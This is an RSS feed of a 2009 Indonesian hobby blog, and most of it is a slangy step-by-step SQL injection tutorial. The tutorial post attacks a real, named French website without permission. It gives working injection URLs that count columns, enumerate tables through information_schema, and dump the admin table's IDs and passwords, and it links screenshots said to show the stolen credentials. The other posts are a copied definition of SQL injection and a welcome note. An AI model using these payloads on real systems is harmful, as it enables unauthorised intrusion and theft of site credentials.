<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Miracle from miracle_04</title>
	<atom:link href="http://coolkidz1412.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://coolkidz1412.wordpress.com</link>
	<description>Just another WordPress.com weblog</description>
	<lastBuildDate>Fri, 21 Aug 2009 14:54:20 +0000</lastBuildDate>
	<language>id</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='coolkidz1412.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>Miracle from miracle_04</title>
		<link>http://coolkidz1412.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://coolkidz1412.wordpress.com/osd.xml" title="Miracle from miracle_04" />
	<atom:link rel='hub' href='http://coolkidz1412.wordpress.com/?pushpress=hub'/>
		<item>
		<title>SQLi part 1</title>
		<link>http://coolkidz1412.wordpress.com/2009/08/21/sqli-part-1/</link>
		<comments>http://coolkidz1412.wordpress.com/2009/08/21/sqli-part-1/#comments</comments>
		<pubDate>Fri, 21 Aug 2009 14:54:19 +0000</pubDate>
		<dc:creator>coolkidz1412</dc:creator>
				<category><![CDATA[IT]]></category>

		<guid isPermaLink="false">http://coolkidz1412.wordpress.com/?p=27</guid>
		<description><![CDATA[Di artikel ni gw bkal jelasin ttg langkah2 &#8220;SQLi&#8221; (SQL injection) yang mana materinya gw ambilin dr pengalaman g ndiri, ni asli bez,&#8230;.materi ni gag asal CoPas (Copy Paste), tapi cuma ngopy link target doank&#8230;(buat tmen2 gw yg targetnya gw jdikan target gw juga,, maaph yakkk,, n mhon keiklashannya&#8230;peacee&#8230;). owh ya, di artikel ni yang [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=coolkidz1412.wordpress.com&amp;blog=9018390&amp;post=27&amp;subd=coolkidz1412&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Di artikel ni gw bkal jelasin ttg langkah2 &#8220;SQLi&#8221; (SQL injection) yang mana materinya gw ambilin dr pengalaman g ndiri, ni asli bez,&#8230;.materi ni gag asal CoPas (Copy Paste), tapi cuma ngopy link target doank&#8230;(buat tmen2 gw yg targetnya gw jdikan target gw juga,, maaph yakkk,, n mhon keiklashannya&#8230;peacee&#8230;). owh ya, di artikel ni yang jadi targetnya thu site dr prancis yaitu, http://www.ch-rodez.fr/article.php?id=5&amp;srub=8&amp;idarticle=90</p>
<p>Wokey dah,,</p>
<p>1. Siapkan site yang vurln</p>
<p style="padding-left:30px;">nyari site yang vurln ne bs dengan pake tools atau dengan manual, yaitu menambahkan character petik satu di akhir url,,</p>
<p style="padding-left:30px;">example : <a href="http://www.ch-rodez.fr/article.php?id=5&amp;srub=8&amp;idarticle=90'">http://www.ch-rodez.fr/article.php?id=5&amp;srub=8&amp;idarticle=90&#8242;</a></p>
<p style="padding-left:30px;">site itu dianggap vurln jika stelah dikasih petik satu, site tersebut menampilkan pesan error.</p>
<p style="padding-left:30px;">Klo di site yang vurln biasanya muncul pesan error SQL, tapi di site yg kali ini sedang kita coba cuma muncul <strong>&#8220;erreur select&#8221; </strong>(kyaknya udah di patch ma adminnya, tp ga tau lah koq bs di inject), buat meyakinkan lagi, qt lanjut ajjah  deh ke next step&#8230;</p>
<p>2. memeriksa jumlah column yang ada dalam halaman yg vurln itu(gag tau lah istilahnya apa, liat aj deh caranya)</p>
<p style="padding-left:30px;">jd pkoknya kita thu ngecek jumlah kolom yang ada di site itu dengan perintah &#8220;+ORDER+BY+jumlah kolom perkiraan&#8221;.</p>
<p style="padding-left:30px;">pertama-tama gw pake perkiraan 5 ye,,</p>
<p style="padding-left:30px;">example : <a href="http://www.ch-rodez.fr/article.php?id=5&amp;srub=8&amp;idarticle=90+order+by+5--">http://www.ch-rodez.fr/article.php?id=5&amp;srub=8&amp;idarticle=90+order+by+5&#8211;</a></p>
<p style="padding-left:30px;">jika page tersebut muncul tanpa pesan error, artinya jumlah kolom yang kita inputkan jumlahnya &lt;=jumlah kolom pada page tersebut.</p>
<p style="padding-left:30px;">selanjutnya kita coba dengan perkiraan 10 (aslinye ni terserah lo guys pake perkiraan brapa..)</p>
<p style="padding-left:30px;">example : <a href="http://www.ch-rodez.fr/article.php?id=5&amp;srub=8&amp;idarticle=90+order+by+10--">http://www.ch-rodez.fr/article.php?id=5&amp;srub=8&amp;idarticle=90+order+by+10&#8211;</a></p>
<p style="padding-left:30px;">jrengggg, muncul pesan error thhu&#8230;hayo napa hayo??</p>
<p style="padding-left:60px;">temen gw yang nnton aksi gw : &#8220;coolkidz, lo apain huh? koq bs gtuh???&#8221;</p>
<p style="padding-left:60px;">coolkidz : sambil siulan and tetep cool bilang, &#8220;rahasia&#8230;lo liat aj ntar pnjelasannya di blog gw&#8221;.</p>
<p style="padding-left:30px;">tapi klo lo yang tanya guys, gw ksh tw,, ithu thu ye bcoz of jumlah perkiraan kolom yang kita masukkan melebihi jumlah kolom sebenernye&#8230;klo di site ntu pan munculnya lagi2 <strong>&#8220;erreur select&#8221; </strong>tapi pada umumnya ntu munculnya <strong>&#8221; Unknown column &#8216;jumlah kolom perkiraan yang salah&#8217; in &#8216;order clause&#8217; &#8220;, </strong>gtuh&#8230;ok??qt coba kurangin klo gtuh,,10 kurangin 1 jadi <span style="text-decoration:line-through;">8</span> <strong>9</strong>,,</p>
<p style="padding-left:30px;">example : <a href="http://www.ch-rodez.fr/article.php?id=5&amp;srub=8&amp;idarticle=90+order+by+9--">http://www.ch-rodez.fr/article.php?id=5&amp;srub=8&amp;idarticle=90+order+by+9&#8211;</a></p>
<p style="padding-left:30px;">jrengggg, muncul thu sitenya&#8230;</p>
<p style="padding-left:30px;">kesimpulan : klo tadi dengan angka 10 udah error trus coba 9 lha koq muncul,, kesimpulannya&#8230;jumlah kolom di page ntu 9 chuyyy&#8230;trust me deh&#8230;ga prcaya??nyok liat ke step berikutnya&#8230;.</p>
<p>3. memunculkan lokasi kolom</p>
<p style="padding-left:30px;">ne maksudnya buat munculin lokasi kolom yang ada di page thu, yang nantinya akan kita pakai buat munculin username n passwordnya&#8230;caranya thu dengan menjabarkan value2 kolom td&#8230;misal td kan jumlah kolom yg kita dpet <strong>9</strong>..jadi kita jabarkan sperti <strong>1,2,3,4,5,6,7,8,9</strong>.</p>
<p style="padding-left:30px;">guest : maksudnya???</p>
<p style="padding-left:30px;">gw : bingung??msh bingung??gag mudeng??</p>
<p style="padding-left:60px;">idih wow, ywd deh langsung ke TKP aj. Jangan banyak teori&#8230;<strong>Talk Less do More</strong>,,cabut chuy&#8230;</p>
<p style="padding-left:30px;">example : <a href="http://www.ch-rodez.fr/article.php?id=5&amp;srub=8&amp;idarticle=90+union+all+select+1,2,3,4,5,6,7,8,9--">http://www.ch-rodez.fr/article.php?id=5&amp;srub=8&amp;idarticle=90+union+all+select+1,2,3,4,5,6,7,8,9&#8211;</a></p>
<p style="padding-left:30px;">guest : what???apaan nih??apa maksudnya??tetep aj thu tampilannya..gag ngefect&#8230;gag mutu lo coolkidz&#8230;palsu lo!!!</p>
<p style="padding-left:30px;">coolkidz : sambil siulan n tetep cool bilang,&#8221;santai2,, just <strong>slow down</strong> baby&#8230;.&#8221;.</p>
<p style="padding-left:30px;">coba deh kita tambahin tanda dash, alias minus atw klo msh gag ngerti yg ni neh simbolnya <strong>- </strong>di sebelum angka 5 (<a href="http://www.ch-rodez.fr/article.php?id=5&amp;srub=8&amp;idarticle=90+union+all+select+1,2,3,4,5,6,7,8,9--">http://www.ch-rodez.fr/article.php?id=-5&amp;srub=8&amp;idarticle=90+union+all+select+1,2,3,4,5,6,7,8,9&#8211;</a>) , muncul gag? klo msh belum lo hapus dash td n cuba taruh dashnya di sebelum angka 8 (<a href="http://www.ch-rodez.fr/article.php?id=5&amp;srub=-8&amp;idarticle=90+union+all+select+1,2,3,4,5,6,7,8,9--">http://www.ch-rodez.fr/article.php?id=5&amp;srub=-8&amp;idarticle=90+union+all+select+1,2,3,4,5,6,7,8,9&#8211;</a> ), masih blom??? trakhir neh,, taruh di sebelum angka 90 (<a href="http://www.ch-rodez.fr/article.php?id=5&amp;srub=8&amp;idarticle=-90+union+all+select+1,2,3,4,5,6,7,8,9--">http://www.ch-rodez.fr/article.php?id=5&amp;srub=8&amp;idarticle=-90+union+all+select+1,2,3,4,5,6,7,8,9&#8211;</a>).akhirnya,,</p>
<p style="padding-left:30px;">what???punya lo lom bs??lo matiin aj kompi lo. bawa ke toko kompi, lo jual!!! wkwkwkw, ad2 aj&#8230; coba tliti lg deh bung..waktu g nulis neh artikel msh bs kq, klo mank gag bs banget hubungin gw deh,, biar gw apus neh artikel..ok?? next step&gt;&gt;</p>
<p>4. memasukkan script untuk melihat versi db atw user db atw nama db</p>
<p style="padding-left:30px;">stelah lo nglakuin step ke-3 td pan hasilnya muncul page kosong n ada angkanya doank ye?</p>
<p style="padding-left:30px;">ya kgag??ha?? nggak?? lo blum bruntung kaliii, yg brhasil lanjut ye ma gw..</p>
<div id="attachment_29" class="wp-caption alignnone" style="width: 470px"><img class="size-full wp-image-29" title="kolom" src="http://coolkidz1412.files.wordpress.com/2009/08/kolom.jpg?w=460&#038;h=299" alt="hasil step 3" width="460" height="299" /><p class="wp-caption-text">hasil step 3</p></div>
<p style="padding-left:30px;">dari gambar di atas kita tarik deh kesimpulan, bahwasannya kolom yang bs kita gunakan sbagai output ntar noh kolom 3,4,5 and 7. kembali ke topik step 4 (memasukkan script untuk melihat versi db atw user db atw nama db) kita langsung aj nginject dengan script sperti,</p>
<p style="padding-left:30px;">example :<a href="http://www.ch-rodez.fr/article.php?id=5&amp;srub=8&amp;idarticle=-90+union+all+select+1,2,database(),version(),user(),6,7,8,9--"> </a><a href="http://www.ch-rodez.fr/article.php?id=5&amp;srub=8&amp;idarticle=-90+union+all+select+1,2,database(),version(),user(),6,7,8,9--">http://www.ch-rodez.fr/article.php?id=5&amp;srub=8&amp;idarticle=-90+union+all+select+1,2,database(),version(),user(),6,7,8,9&#8211;</a></p>
<p style="padding-left:30px;">Kesimpulannya :  untuk menampilkan user db kita menggunakan user(), nama database kita gunakan database(), sedangkan versi db kita gunakan version(),,dan itu di tuliskan di kolom yg td tampil, dalam artikel ne si coolkidz pake kolom 4 and 5, lo bs pake kolom lainnya klo mw,tp cuma bs kolom2 yg td muncul, yaitu kolom 3,4,5 or 7.ok?? next step&gt;&gt;</p>
<p>5. menampilkan daftar tabel yang ada pada database</p>
<p style="padding-left:30px;">disini neh kita bru mulai blajar nakal dikit,,blajar ngintip&#8230;woy jangan horny dulu&#8230;ne bukan ngintipin cewek bugil, mandi atw ap&#8230;ngeres ja otak lo!!okehhh, kita ngintipin databasenya orang nyokkk&#8230;caranya tetep dengan nginject-in script ke dalam db nya ntu site,,</p>
<p style="padding-left:30px;">example : <a href="http://www.ch-rodez.fr/article.php?id=5&amp;srub=8&amp;idarticle=-90+union+all+select+1,2,3,version(),user(),6,group_concat(table_name),8,9+from+information_schema.tables+where+table_schema=database()--">http://www.ch-rodez.fr/article.php?id=5&amp;srub=8&amp;idarticle=-90+union+all+select+1,2,3,version(),user(),6,group_concat(table_name),8,9+from+information_schema.tables+where+table_schema=database()&#8211;</a></p>
<p style="padding-left:30px;">
<div id="attachment_30" class="wp-caption alignnone" style="width: 470px"><img class="size-full wp-image-30" title="tabel" src="http://coolkidz1412.files.wordpress.com/2009/08/tabel.jpg?w=460&#038;h=238" alt="hasil step 4" width="460" height="238" /><p class="wp-caption-text">hasil step 4</p></div>
<p style="padding-left:30px;">coolkidz : sambil siulan bilang,&#8221;gimana??langsung mata lo tertuju ke tabel adminnya ja..jangan kmana2!!!&#8221;</p>
<p style="padding-left:30px;">guest : &#8220;bntar bang, ntu kq bs gtuh seh??jelasin dulu donk!!! jangan ngacir gtuh aje..&#8221;, sambil marah2..</p>
<p style="padding-left:30px;">coolkidz : wokey, gw jelasin</p>
<blockquote>
<blockquote>
<ol>
<li>group_concat(table_name) ==&gt; gw tulis di bagian kolom no.7, sesuai dengan syntax nya, thu fungsinya buat nampilin nama tabel secara group klo gag pake group_concat().</li>
<li>from+information_schema.tables ==&gt; kolom yang kita ambil datanya di database information schema</li>
<li>where+table_schema=database() ==&gt; kondisi untuk menampilkan tabel2 yang mana dia berada di baris yang kolom table_schema nya berisikan nama database yang kita inginkan data tabelnya.</li>
<li><strong>&#8211;</strong> tanda itu biasa ada di akhir inject lom tau fungsinya apaan jadi sorry gag gw jelasin. maklum neh gw ne ank baru di dunia gnian..</li>
</ol>
</blockquote>
</blockquote>
<p style="padding-left:30px;">next step&gt;&gt;</p>
<p>6. Mengambil data kolom dari tabel yang telah kita temukan</p>
<p style="padding-left:30px;">wokey,, now qt akan mengintip lebih dalam lagi ke dalam tabel itu&#8230;sasarannya yaitu,,nama kolom&#8230;seppp, buat dapetin data dalam tabel ntu kita harus tau dulu nama2 kolom dalam tabel itu yang nantinya akan kita ambil datanya.ok bro??</p>
<p style="padding-left:30px;">next &gt;&gt; qt langsung inject aj lg buat ngambil data kolom dr tabel yang kita incar sejak awal ==&gt; tabel &#8220;admin&#8221;.</p>
<p style="padding-left:30px;">example : <a href="http://www.ch-rodez.fr/article.php?id=5&amp;srub=8&amp;idarticle=-90+union+all+select+1,2,3,version(),user(),6,group_concat(column_name),8,9+from+information_schema.columns+where+table_name=0x61646d696e--">http://www.ch-rodez.fr/article.php?id=5&amp;srub=8&amp;idarticle=-90+union+all+select+1,2,3,version(),user(),6,group_concat(column_name),8,9+from+information_schema.columns+where+table_name=0x61646d696e&#8211;</a></p>
<p style="padding-left:30px;">jrengggg,</p>
<p style="padding-left:30px;">
<div id="attachment_33" class="wp-caption alignnone" style="width: 470px"><img class="size-full wp-image-33" title="hasil step 6" src="http://coolkidz1412.files.wordpress.com/2009/08/kolom-tabel-admin1.jpg?w=460&#038;h=309" alt="hasil step 6" width="460" height="309" /><p class="wp-caption-text">hasil step 6</p></div>
<p style="padding-left:30px;">sepp, dapat khan nama kolomnya?? next on&gt;&gt; sorry neh klo cpet2 gw buru2 mo meeting ke batu..klo lo ad pertanyaan japri gw di ym coolkidz1412@ymail.com atw ksh comment diartikel ni aj&#8230;</p>
<p>7. Mengambil data dr kolom yang sudah di temukan</p>
<p style="padding-left:30px;">it&#8217;s the show time&#8230;</p>
<p style="padding-left:30px;">lo ikutin link ni aj deh,,</p>
<p style="padding-left:30px;">example : <a href="http://www.ch-rodez.fr/article.php?id=5&amp;srub=8&amp;idarticle=-90+union+all+select+1,2,3,version(),user(),6,group_concat(concat_ws(0x3a,id,motdepasse,enligne)),8,9+from+admin--">http://www.ch-rodez.fr/article.php?id=5&amp;srub=8&amp;idarticle=-90+union+all+select+1,2,3,version(),user(),6,group_concat(concat_ws(0x3a,id,motdepasse,enligne)),8,9+from+admin&#8211;</a></p>
<p style="padding-left:30px;">
<div id="attachment_34" class="wp-caption alignnone" style="width: 470px"><img class="size-full wp-image-34" title="hasil step 7" src="http://coolkidz1412.files.wordpress.com/2009/08/username-n-password.jpg?w=460&#038;h=314" alt="hasil step 7" width="460" height="314" /><p class="wp-caption-text">hasil step 7</p></div>
<p style="padding-left:30px;">temen gw yg nnton : idih wow,, kq bs gtuh coolkidz??</p>
<p style="padding-left:30px;">coolkidz : sambil siulan n packing barang2,&#8221;kapan2 deh gw jelasin,, gw mo brangkat ke batu..&#8221;</p>
<blockquote>
<p style="padding-left:30px;">&#8220;guys, gw cuma bs smpe sini aj&#8230;untuk step yg lom gw jelasin tp lo msh juga lom mudeng/jelas/paham lo japri gw ke coolkidz1412@ymail.com atw ksh comment di artikel ni aj yawh,,dah dulu yow,, C u on next articles&#8230;&#8221;</p>
</blockquote>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/coolkidz1412.wordpress.com/27/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/coolkidz1412.wordpress.com/27/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/coolkidz1412.wordpress.com/27/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/coolkidz1412.wordpress.com/27/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/coolkidz1412.wordpress.com/27/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/coolkidz1412.wordpress.com/27/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/coolkidz1412.wordpress.com/27/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/coolkidz1412.wordpress.com/27/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/coolkidz1412.wordpress.com/27/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/coolkidz1412.wordpress.com/27/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/coolkidz1412.wordpress.com/27/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/coolkidz1412.wordpress.com/27/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/coolkidz1412.wordpress.com/27/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/coolkidz1412.wordpress.com/27/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=coolkidz1412.wordpress.com&amp;blog=9018390&amp;post=27&amp;subd=coolkidz1412&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://coolkidz1412.wordpress.com/2009/08/21/sqli-part-1/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/75f1b5d280e83b7bdb714d465329460a?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">coolkidz1412</media:title>
		</media:content>

		<media:content url="http://coolkidz1412.files.wordpress.com/2009/08/kolom.jpg" medium="image">
			<media:title type="html">kolom</media:title>
		</media:content>

		<media:content url="http://coolkidz1412.files.wordpress.com/2009/08/tabel.jpg" medium="image">
			<media:title type="html">tabel</media:title>
		</media:content>

		<media:content url="http://coolkidz1412.files.wordpress.com/2009/08/kolom-tabel-admin1.jpg" medium="image">
			<media:title type="html">hasil step 6</media:title>
		</media:content>

		<media:content url="http://coolkidz1412.files.wordpress.com/2009/08/username-n-password.jpg" medium="image">
			<media:title type="html">hasil step 7</media:title>
		</media:content>
	</item>
		<item>
		<title>sql injection</title>
		<link>http://coolkidz1412.wordpress.com/2009/08/20/sql-injection/</link>
		<comments>http://coolkidz1412.wordpress.com/2009/08/20/sql-injection/#comments</comments>
		<pubDate>Thu, 20 Aug 2009 11:07:04 +0000</pubDate>
		<dc:creator>coolkidz1412</dc:creator>
				<category><![CDATA[IT]]></category>
		<category><![CDATA[inject url]]></category>
		<category><![CDATA[SQL injection]]></category>
		<category><![CDATA[SQLi]]></category>

		<guid isPermaLink="false">http://coolkidz1412.wordpress.com/?p=25</guid>
		<description><![CDATA[http://id.wikipedia.org/wiki/Injeksi_SQL#Karakter-karakter_pelolos_yang_tidak_disaring_secara_benar<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=coolkidz1412.wordpress.com&amp;blog=9018390&amp;post=25&amp;subd=coolkidz1412&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Wokeyyy,</p>
<p>pertama-tama alias the first&#8230;</p>
<p>I&#8217;ll terangin ke loe ttg pengertian SQL injection dulu,,(ibarat bayi lahir gag mungkin langsung jalan khan??bagi newbie2=&gt;termasuk gw,, psen gw cuma satu,, di dunia ni gag da yg instan,, smuanya btuh proses,, so baca dulu pengertian dasarnya ttg SQL injection yg bkal g jelasin stelah kalimat ini).</p>
<p><strong>SQL injction (Injeksi SQL)</strong> adalah sebuah teknik yang menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan basis data sebuah aplikasi. Celah ini terjadi ketika masukan pengguna tidak disaring secara benar dari karakter-karakter pelolos bentukan string yang diimbuhkan dalam pernyataan SQL atau masukan pengguna tidak bertipe kuat dan karenanya dijalankan tidak sesuai harapan. Ini sebenarnya adalah sebuah contoh dari sebuah kategori celah keamanan yang lebih umum yang dapat terjadi setiap kali sebuah bahasa pemrograman atau skrip diimbuhkan di dalam bahasa yang lain.</p>
<p>Gimana?? dah dapet gambaran lom??</p>
<p>Masih gag jelas yeh??Sorry, thu td CoPas dr wiki,,^_^</p>
<p>Gni neh intinye&#8230;</p>
<p>SQLi thu teknik nyelipin script query SQL dengan memanfaatkan celah keamanan pada database yg di pakai suatu site dan kelemahan(vurln) pada suatu site,celah ni bisa ada thu di sebabkan oleh si pembuat site yang kurang teliti noh ngefilter inputan2 pada form maupun url sitenya,,</p>
<p>okey, cuma thu deh yang bs gw jelasin about SQLi,,</p>
<p>next&gt;&gt; Gw kan jelasin langkah2 SQLi yang sumbernya berdasarkan pengalaman gw,,</p>
<p>Tp gw jelasinnya di artikel stelah niy,,</p>
<p>ok??!!</p>
<p>(Klo &#8220;OK&#8221; udahan donk baca yang ni!! Pergi sno ke next artikel yg judulnya &#8220;SQLi part 1&#8243;)</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/coolkidz1412.wordpress.com/25/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/coolkidz1412.wordpress.com/25/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/coolkidz1412.wordpress.com/25/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/coolkidz1412.wordpress.com/25/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/coolkidz1412.wordpress.com/25/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/coolkidz1412.wordpress.com/25/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/coolkidz1412.wordpress.com/25/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/coolkidz1412.wordpress.com/25/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/coolkidz1412.wordpress.com/25/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/coolkidz1412.wordpress.com/25/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/coolkidz1412.wordpress.com/25/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/coolkidz1412.wordpress.com/25/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/coolkidz1412.wordpress.com/25/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/coolkidz1412.wordpress.com/25/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=coolkidz1412.wordpress.com&amp;blog=9018390&amp;post=25&amp;subd=coolkidz1412&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://coolkidz1412.wordpress.com/2009/08/20/sql-injection/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/75f1b5d280e83b7bdb714d465329460a?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">coolkidz1412</media:title>
		</media:content>
	</item>
		<item>
		<title>Selamat datang di Miracle site</title>
		<link>http://coolkidz1412.wordpress.com/2009/08/15/halo-dunia/</link>
		<comments>http://coolkidz1412.wordpress.com/2009/08/15/halo-dunia/#comments</comments>
		<pubDate>Sat, 15 Aug 2009 09:05:54 +0000</pubDate>
		<dc:creator>coolkidz1412</dc:creator>
				<category><![CDATA[Tak Berkategori]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[Selamat datang di miracle site&#8230; Di site ini anda dapat mendapatkan info-info terbaru mengenai dunia IT, Musik, Basket dan lain &#8211; lain apa aj yang skiranya bisa gua posting,hwehwhe.. Skian gtuh aj deh intronya, Males nulis kata sambutan, maklum deh&#8230;Bhasa Indo gw jeblok..wkwkwkwkw&#8230; Udah skian ye intronya, C u next on my articles&#8230;Don&#8217;t forget to [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=coolkidz1412.wordpress.com&amp;blog=9018390&amp;post=1&amp;subd=coolkidz1412&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Selamat datang di miracle site&#8230;</p>
<p>Di site ini anda dapat mendapatkan info-info terbaru mengenai dunia IT, Musik, Basket dan lain &#8211; lain apa aj yang skiranya bisa gua posting,hwehwhe..</p>
<p>Skian gtuh aj deh intronya,<br />
Males nulis kata sambutan, maklum deh&#8230;Bhasa Indo gw jeblok..wkwkwkwkw&#8230;</p>
<p>Udah skian ye intronya,</p>
<p>C u next on my articles&#8230;Don&#8217;t forget to give my article comments..</p>
<p>Thank u,</p>
<p>Best Regards,</p>
<p>miracle_04</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/coolkidz1412.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/coolkidz1412.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/coolkidz1412.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/coolkidz1412.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/coolkidz1412.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/coolkidz1412.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/coolkidz1412.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/coolkidz1412.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/coolkidz1412.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/coolkidz1412.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/coolkidz1412.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/coolkidz1412.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/coolkidz1412.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/coolkidz1412.wordpress.com/1/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=coolkidz1412.wordpress.com&amp;blog=9018390&amp;post=1&amp;subd=coolkidz1412&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://coolkidz1412.wordpress.com/2009/08/15/halo-dunia/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/75f1b5d280e83b7bdb714d465329460a?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">coolkidz1412</media:title>
		</media:content>
	</item>
	</channel>
</rss>
